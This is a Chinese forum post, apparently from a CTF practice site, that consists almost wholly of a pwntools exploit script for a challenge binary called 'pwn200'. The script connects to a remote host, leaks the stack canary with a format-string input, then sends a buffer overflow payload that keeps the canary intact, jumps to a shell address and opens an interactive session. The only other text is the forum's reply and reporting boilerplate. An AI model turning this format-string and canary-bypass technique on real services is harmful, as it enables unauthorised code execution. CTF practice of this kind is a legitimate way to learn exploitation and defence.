|
发表于 2021-9-12 18:28:33
|
查看: 2365 |
回复: 0
from pwn import *
io = remote('xuenixiang.cn','22943')
# io = process('./pwn200')
io.sendline(b"%15$x%16$x")
recv = io.recv()
canary = int(recv[0:8],16)
then = int(recv[8:16],16)
#canary = int(io.recv(), 16)
print(hex(canary),hex(then))
log.info("canary: 0x%x" % canary)
print(type(p32(canary)))
print(p32(canary)[1:])
print(p32(canary))
binsh = 0x08048556#0x80491a2
payload = b"A" * 0x28 + p32(canary) + p32(then) + b"A" * 24 + p32(binsh)
#payload = "A" * 0x28 + p32(canary) + "A" * 12 + p32(binsh)
io.sendline(payload)
io.interactive()
|
温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的认可,还可以获得学币奖励,请尊重他人的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【 投诉建议】板块发帖举报。
|